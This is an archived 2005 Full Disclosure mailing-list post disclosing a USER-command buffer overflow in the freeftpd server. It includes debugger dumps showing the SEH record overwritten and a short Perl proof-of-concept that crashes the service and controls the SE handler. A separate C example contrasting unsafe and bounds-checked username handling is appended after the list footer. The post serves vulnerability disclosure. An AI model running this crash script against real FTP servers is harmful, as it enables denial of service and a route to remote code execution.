Full Disclosure mailing list archives
freeftpd USER bufferoverflow
From: barabas mutsonline <barbsie () gmail com>
Date: Wed, 16 Nov 2005 10:56:54 +0100
Hi,

While drooling over my new Adriana Lima wallpaper, my tongue accidentally hit my keyboard and more than 1012 chars were sent to the login screen of my freeftpd server (which I use to backup my Adriana Lima pics). Guess what... the server crashed! Luckily I attach ollydbg to every process I have running and this is what I found:

ECX 50505050
EIP 77C460CB msvcrt.77C460CB

Log data, item 0
Address=77C460CB
Message=Access violation when reading [50505050]

77C460CB 8B01 MOV EAX,DWORD PTR DS:[ECX]

Well, EIP doesn't get overwritten, but SEH does:

0012B6CC 41414141
0012B6D0 42424242
0012B6D4 42424242
0012B6D8 43434343 Pointer to next SEH record
0012B6DC 47464544 SE handler

EIP 47464544

Log data, item 0
Address=47464544
Message=Access violation when executing [47464544]

I leave the exploit coding as an exercise... enjoy

sample crash code:

#!/usr/bin/perl -w
# freeftpd USER buffer overflow
# barabas - 2005
use strict;
use Net::FTP;

my $user = "\x41" x 1011;
$user .= "\x44\x45\x46\x47";    # overwrite SEH
$user .= "\x50" x 400;

# Net::FTP->new returns undef (with the reason in $@) if the connection fails
my $ftp = Net::FTP->new("127.0.0.1", Debug => 1)
    or die "cannot connect: $@";
$ftp->login("$user", "whatevah");
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
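The crash reported above is the classic result of copying the USER argument into a fixed-size stack buffer without a length check, so that the overflow runs into the saved SEH record. The C snippet below is an added illustration and not freeftpd's code (which is not public): a hypothetical handler showing that unsafe pattern next to a hardened version that validates the argument before it ever touches the stack buffer. The 1012-byte buffer (mirroring the threshold in the post) and the 64-character username policy limit are assumptions.

```c
#define _POSIX_C_SOURCE 200809L   /* for strnlen() */
#include <stdio.h>
#include <string.h>

/* Assumed sizes: USER_BUF_LEN mirrors the ~1012-char threshold in the post,
 * USER_MAX_LEN is a hypothetical policy limit on accepted usernames. */
#define USER_BUF_LEN 1012
#define USER_MAX_LEN 64

/* Unsafe pattern (illustrative only, never feed it untrusted input):
 * the USER argument is copied into a fixed stack buffer with no bound,
 * so an over-long argument overwrites whatever sits above the buffer,
 * including the SEH chain seen in the debugger output above. */
int handle_user_unsafe(const char *arg)
{
    char user[USER_BUF_LEN];
    strcpy(user, arg);            /* no length check: stack overflow */
    return (int)strlen(user);
}

/* Hardened version: measure with a bound, reject anything over the policy
 * limit before copying, copy exactly n bytes and NUL-terminate.
 * Returns the accepted length, or -1 when the argument is rejected. */
int handle_user_safe(const char *arg)
{
    char user[USER_BUF_LEN];
    size_t n;

    if (arg == NULL)
        return -1;
    n = strnlen(arg, USER_BUF_LEN);   /* never scans past the buffer size */
    if (n > USER_MAX_LEN)             /* also rejects any overflow attempt */
        return -1;
    memcpy(user, arg, n);
    user[n] = '\0';
    return (int)n;
}

int main(void)
{
    char longname[1500];                      /* constructed over-long USER */
    memset(longname, 'A', sizeof longname - 1);
    longname[sizeof longname - 1] = '\0';
    printf("short: %d\n", handle_user_safe("barabas"));   /* 7 */
    printf("long:  %d\n", handle_user_safe(longname));    /* -1 */
    return 0;
}
```

The safe handler never calls strcpy, and rejecting at the protocol layer (a 5xx reply to an over-long USER) is the check the server should have performed before the crash was reachable.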
Current thread:
- freeftpd USER bufferoverflow barabas mutsonline (Nov 16)
- <Possible follow-ups>
- re: freeftpd USER bufferoverflow KF (lists) (Nov 16)
- RE: freeftpd USER bufferoverflow ad (Nov 16)